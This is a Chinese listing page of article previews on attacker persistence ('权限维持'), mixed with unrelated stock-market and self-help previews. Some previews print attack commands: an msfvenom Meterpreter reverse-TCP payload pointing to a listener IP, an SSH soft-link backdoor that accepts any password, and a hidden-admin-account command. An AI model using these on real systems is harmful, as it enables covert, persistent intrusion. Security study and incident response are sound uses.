首页
Python
Java
前端
数据库
Linux
Chatgpt专题
开发者工具箱
维持专题
145-Linux权限维持Rootkit后门Strace监控Alias别名Cron定时任务
参考 【权限维持】Linux&Rootkit后门&Strace监控&Alias别名&Cron定时任务_alias ls='alerts(){ ls $* --color=auto;python -c "-CSDN博客 参考 FlowUs 息流 - 新一代生产力工具 权限维持-Linux-定时任务-Cron后门 利用系统的定时任务功能进行反弹Shell 1、编辑后门反弹shell脚本
阅读更多...
第143天:内网安全-权限维持自启动映像劫持粘滞键辅助屏保后门WinLogon
案例一: 权限维持-域环境&单机版-自启动 自启动路径加载 路径地址 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\##英文C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\开始菜单\程序\启动\ #
阅读更多...
第142天: 内网安全-权限维持黄金白银票据隐藏账户C2 远控RustDeskGotoHTTP
案例一: 内网域&单机版-权限维持-基于用户-隐藏用户 项目下载地址: GitHub - wgpsec/CreateHiddenAccount: A tool for creating hidden accounts using the registry || 一个使用注册表创建隐藏帐户的工具 用这个工具的话在域中会把它加入administrator组中,在单机环境中的话,不会划入任何组中,所
阅读更多...
Linux权限维持实战
目录 介绍步骤 介绍 攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和后门文件 查看/tmp目录下的flag文件 查看/root目录下具有特殊文件属性的文件 操作机中共有几个SUID文件 操作机中共有几个SGID文件 查看操作机中ssh公私钥免密登陆 查看strace后门 步骤 查看/tmp目录 查看各个隐藏文件夹,可以在.esd-0的隐藏文件夹看到sock
阅读更多...
Windows权限维持实战
目录 介绍步骤 介绍 在攻击过程中中对于拿到的shell或钓上来的鱼,目前比较流行用CS做统一管理,但实战中CS官方没有集成一键权限维持的功能,为了将该机器作为一个持久化的据点,种植一个具备持久化的后门,从而随时可以连接该被控机器进行深入渗透。 步骤 打开桌面的文件夹 点击查看 > 选项 在查看中勾选以下选项 可以看到一个利用文件属性隐藏的txt文件和一个利用a
阅读更多...
蓝队技能-应急响应篇C2后门权限维持手法WindowsLinux基线检查排查封锁清理
知识点 1、应急响应-C2后门-排查&封锁2、应急响应-权限维持-排查&清理3、应急响应-基线检测-整改&排查 演示案例-蓝队技能-C2后门&权限维持-基线检查&查杀封锁-Windows 1、常规C2后门-分析检测 无隐匿手法 也可以把怀疑的exe程序上传到沙箱上分析 有隐匿手法 CDN,云函数,中转等(涉及溯源和反制) 处置手段 清除:删除文件 封锁:防火墙都有
阅读更多...
权限维持--小结
权限维持 windows 域环境 基于验证 DLL 加载-SSP 基于验证 DLL 加载-HOOK 基于机制账号启用-DSRM 基于用户属性修改-SID-history 基于登录进程劫持-Skeleton-Key 单机 基于用户-隐藏用户 基于服务 TGT-黄金白银票据 基于软件-GotoHTTP&RustDesk 自启动 粘滞键 映像劫持 (多) 屏保
阅读更多...
以无厚,入有间,做一件事为什么靠努力不行,不能长期维持
庖丁解牛,并不是在说人和技巧,而是在说解牛不在于刀的锋利,而是怎样才能做到让刀不产生损耗,就是熟悉牛肉纹路,按照纹路和肉骨间隙进行操刀。这就是尊重自然规律,对于人也是一样的,如果所有事情是靠努力去做,一旦没有了努力的动力,就会失败,失败也会损耗和自我否认,日积月累的损耗会将一把锋利的刀刃变的卷钝,同样的,一旦否认形成,一次次的挫败就会把自己损耗的体无完肤也变的同样卷钝。就像水流入海,从没有说过要把
阅读更多...
揭秘融资融券中的生命线——维持担保比例
01 通俗讲解融资融券 1、融资融券交易,又称信用交易,是指投资者向证券公司提交保证金 ①在看涨时,从证券公司借入资金低价买入证券再高价卖出;(加杠杆) ②在看跌时,从证券公司借入证券高价卖出再低价买回,从而获得收益的交易方式。(赚差价) 融资融券可以放大证券供求增加交易量,放大资金的使用效果,对于增加股市流通性和交易活跃性有着明显的作用,从而有效地降低了流动性风险。 股票前面带有融字
阅读更多...
.NET 分享一款多种方式维持权限的工具
01阅读须知 此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面 02工具介绍 Sharp4Stay是一款功能强大的工具,专门设计用于在 Windows 环境中维持内网
阅读更多...
域内 dcsync 权限维持
一、原理 DCSync 是域渗透中经常会用到的技术,其被整合在了 Mimikatz 中。在 DCSync 功能出现之前,要想获得域用户的哈希,需要登录域控制器,在域控制器上执行代码才能获得域用户的哈希。 Mimikatz的DCSync 功能: 该功能可以模仿一个域控制器,从真实的域控制器中请求数据,例如用户的哈希。该功能最大的特点就是不用登陆域控制器,即可远程通过域数据同步复制的方
阅读更多...
消金公司2023财报解析:息差维持高位,信用成本攀升
来源 | 镭射财经(leishecaijing) 2023年,是持牌消金行业承上启下的关键一年,也是锻造韧性、比拼内功最紧张的一年。 一方面,住户短期消费贷款余额在2022年触底后,伴随经济复苏、消费提振,于2023年重新回到上行轨道。短期消费贷的结构性增长空间扩大,加之互联网贷款整顿的外溢流量,强化了消费金融公司的补位角色,增长动能进一步释放。 另一方面,消费金融公司为求增长,打响了稳息差
阅读更多...
linux权限维持(二)
3.SSH 后门 3.1 SSH 软连接后门 软连接后门的原理是利用了 PAM 配置文件的作用,将 sshd 文件软连接名称设置为 su ,这样应用在启动过 程中他会去PAM 配置文件夹中寻找是否存在对应名称的配置信息 (su) ,然而 su 在 pam_rootok 只检测 uid 0 即可认证成功,这样就导致了可以使用任意密码登录 : ln -sf /u
阅读更多...
内网渗透-windows权限维持的方法
windows权限维持的方法 文章目录 windows权限维持的方法一、影子账户二、粘滞键后门三、logon scripts后门五、注册表自启动后门六、屏幕保护程序后门七、计划任务后门八、服务自启动后门九、黄金票据十、白银票据十二、bitsadmin十五、CLR劫持 一、影子账户 1.使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /ad
阅读更多...
网络安全之权限维持那点事
权限维持 一旦黑客成功地入侵了目标系统,他们通常会尝试保持对系统的持久访问权,以便继续执行恶意活动,如窃取敏感数据、植入恶意软件、破坏系统功能等。 权限维持的过程可能包括以下几个方面: 后门植入:黑客可能会在系统中植入后门程序,以便在未来能够轻松地再次访问系统,而不需要重新入侵。这些后门可能是通过潜在的安全漏洞、恶意软件或其他技术手段实现的。 提权:黑客可能会试图提升其在系统中的权限级别
阅读更多...
腾讯云(CVM)托管进行权限维持
前言 刚好看到一个师傅分享了一个阿里云ECS实战攻防,然后想到了同样利用腾讯云CVM的托管亦可实现在实战攻防中的权限维持。 简介 腾讯云自动化助手(TencentCloud Automation Tools,TAT)是一个原生运维部署工具,它可以在不登录或输入密码的情况下,实现对云服务器 CVM 和轻量应用服务器 Lighthouse 的自动化远程操作。该工具支持批量执行命令,包括 Shel
阅读更多...
如何维持APP用户的登陆状态
如何维持APP用户的登陆状态 一。一种方式 原文链接:http://ciniao.legu.cc/appcan/article_54.html 这个问题太过于常见,也过于简单,以至于大部分开发者根本没有关注过这个问题,我根据和我沟通的开发者中,总结出来常用的方法有以下几种: (个人觉得不简单么) 一:服务端默认的session 这种方式最大的优点是服务端不用增加任何代码,但A
阅读更多...
游戏股的年过完了,盈利下滑,有企业靠卖房维持业绩
2020年初的疫情犹如一只“黑天鹅”,让绝大多数行业陷入停摆,一季度业绩惨淡一片,游戏股却是个另类的存在。在全民“宅”家时期,甚至顺势爆发,为各路资本所追捧。 App Annie向TechWeb提供的一份图表显示,今年一季度中国iOS端游戏的下载量明显高于去年同期。易观互动娱乐行业分析师董振向TechWeb表示,第一季度包含游戏在内的整体线上娱乐领域都有较大幅度的增长,其中游戏市场规模预计超过
阅读更多...
美易官方:美股维持涨势,三大股指再创新高
在今日的早盘交易中,美股市场继续维持其涨势,三大股指再次刷新历史纪录。市场信心受到一系列积极经济数据的支撑,投资者对未来的经济增长和企业盈利保持乐观态度。 首先,让我们来看一下道琼斯工业平均指数的表现。该指数在早盘交易中延续了昨天的上涨趋势,一路上扬并成功突破了前一日的高点。这一成就反映了美国大型企业的强劲表现,这些企业不仅在国内市场表现出色,还在全球范围内拓展业务,取得了令人瞩目的成绩
阅读更多...
第二证券策略:股指预计维持震荡格局 关注消费、农牧饲渔等板块
第二证券指出,在前期高股息盈利板块和科技立异主题接连获得较好体现后,商场出现必定程度的“高切低”现象,首要体现是切换为轻视值和价值方向,中长期高股息盈利和科技立异主题仍是商场主线,3月份后半程关注医药生物、电子、建筑材料、建筑装饰、电力设备、非银金融、机械设备等职业及相关主题中可能存在的时机。 周二A股商场冲高遇阻、小幅震动收拾,早盘股指低开后震动上行,沪指盘中在3090点邻近遭受阻力,午后股指
阅读更多...
Linux权限维持后门及应急响应
本次应急响应实验用kali和centos7来充当攻击机和靶机 kali:192.168.10.130 centos7:192.168.10.155 前提: 用kali连接到centos7上面ssh root@192.168.10.155 一、SSH软链接 任意密码登录即可发现程度:|||||| ln -sf /usr/sbin/sshd /usr/local/su;/usr/lo
阅读更多...
渗透测试框架权限维持技术——Persistence模块
测试环境: kali + win7 测试步骤: 1.利用MSF编写远控程序 msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.163 lport=55555 -f exe -o 5555.exe-p 漏洞利用payloadlhost 监听地址(kali地址)lport 监听端口(这里本来想写5555的,手滑写成了55555
阅读更多...
国创证券策略:股指预计维持震荡格局 关注汽车、通信设备等板块
国创证券指出,近期两市指数持续反弹创新高,但沪指现已率先出现滞涨状况,一起均已进入阻力重压区。不过当时技术形状上坚持较好,可持续做多,一旦跌破重要支撑如沪指的3030点,则需降仓防卫,防止指数进入调整节奏从而出现利润回撤的状况。因而,展望后市,指数进入相对高位,但商场挣钱效应仍然较高,做多情绪仍然较为积极,可持续环绕商场主线如人工智能、半导体、新能源等板块做多,若指数出现明显走弱痕迹则可降仓防卫。
阅读更多...
从小我到大我的进化--记维持5天的思想提高讨论
在提高班,老师常挂在嘴边一句话就是"思想上移,行动下移".这次的讨论大会让思想更上一层楼. 背景: 4月6号的家长会,没有去听米老师讲课,去送家长,有些人请假了,但是超过了两个小时没有续请.对于请假,已经有明文规定了,但是为什么我们遵守纪律呢?在于贵人同行的时候,为什么我们要舍弃米老师的课而且送前来开家长会的家长呢. 正文: 一.请假超过两个小时没有回来,而且没有续假
阅读更多...
小迪安全37WEB 攻防-通用漏洞XSS 跨站权限维持钓鱼捆绑浏览器漏洞
#XSS跨站系列内容:1. XSS跨站-原理&分类&手法 XSS跨站-探针&利用&审计XSS跨站另类攻击手法利用 XSS跨站-防御修复&绕过策略 #知识点: 1、XSS 跨站-另类攻击手法分类 2、XSS 跨站-权限维持&钓鱼&浏览器等 1、原理 指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响 的 HTML 代码,从而盗取用户资料、利用
阅读更多...
账户名密码是怎样被窃取的,简单模拟攻击者权限维持流程。
前言 在我们进行渗透测试的时候,常常需要进行权限维持,常见的 Javascript窃取用户凭证是一种常见的攻击手法。之前我们可能学习过钓鱼网页的使用,如果我们通过渗透测试进入到用户的服务器,其实也可以通过在网页中植入Javascript代码的方式来达到权限维持的效果。本篇文章通过分析Javascript用户凭证窃取,来分析如何进行权限维持。 正文 凭证劫持流程 “凭证劫持”(Cr
阅读更多...